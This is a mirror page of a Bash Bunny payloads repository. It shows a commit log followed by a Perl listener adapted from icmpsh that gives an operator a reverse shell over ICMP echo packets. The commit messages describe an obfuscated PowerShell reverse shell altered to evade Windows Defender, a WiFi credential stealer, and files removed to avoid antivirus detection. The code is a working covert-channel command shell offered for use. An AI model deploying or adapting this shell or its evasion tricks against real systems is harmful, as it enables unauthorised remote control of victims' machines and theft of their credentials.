mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
b64503fe23
* Uploaded ReverseBunny
Obfuscated reverse shell via powershell
* Uploaded WifiSnatch
Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
* Update ReverseBunny.txt
Changed payload to evade Windows Defender
* Update payload.txt
Added new "Eject Method" - props to Night(9o3)
* Update README.md
* Deleted ReverseBunny.txt
Deleted because of higher risk to get caught by AV
* Updated ReverseBunny to version 1.2
Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design
* Updated ReverseBunny to version 1.2
Updated README for ReverseBunny update
* Updated payload
fixed some stupid left overs <3
* Uploaded pingUinBunny
a reverse shell using icmp
* Delete payloads/library/remote_access/switch1 directory
* Uploaded pingUinBunny
A reverse shell using icmp
* Update README.md
* Update README.md
* Updated to PingZhell
* Update Bunny.pl
* Update README.md
* Update README.md
* Update payload.txt
* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl
* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md
* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt
* Update payload.txt
* Update README.md
* Update README.md
* Update Bunny.pl
67 lines
2.2 KiB
Perl
67 lines
2.2 KiB
Perl
#!/usr/bin/env perl
|
|
#
|
|
# icmpsh - simple icmp command shell
|
|
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
#
|
|
# Modified by 0iphor13 for PingZhell
|
|
#
|
|
#
|
|
#
|
|
#
|
|
|
|
|
|
use strict;
|
|
use IO::Socket;
|
|
use NetPacket::IP;
|
|
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
|
|
use Net::RawIP;
|
|
use Fcntl;
|
|
|
|
print "Bunny waitin' for connection...\n";
|
|
|
|
# create raw socket
|
|
my $sock = IO::Socket::INET->new(
|
|
Proto => "ICMP",
|
|
Type => SOCK_RAW,
|
|
Blocking => 1) or die "$!";
|
|
|
|
# set stdin to non-blocking
|
|
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
|
|
|
|
print "Let's wait for PingZhell!\n";
|
|
|
|
my $input = '';
|
|
while(1) {
|
|
if ($sock->recv(my $buffer, 4096, 0)) {
|
|
my $ip = NetPacket::IP->decode($buffer);
|
|
my $icmp = NetPacket::ICMP->decode($ip->{data});
|
|
if ($icmp->{type} == ICMP_ECHO) {
|
|
# get identifier and sequencenumber
|
|
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
|
|
|
|
# write data to stdout and read from stdin
|
|
print $data;
|
|
$input = <STDIN>;
|
|
|
|
# compile and send response
|
|
$icmp->{type} = ICMP_ECHOREPLY;
|
|
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
|
|
my $raw = $icmp->encode();
|
|
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
|
|
$sock->send($raw, 0, $addr) or die "$!\n";
|
|
}
|
|
}
|
|
}
|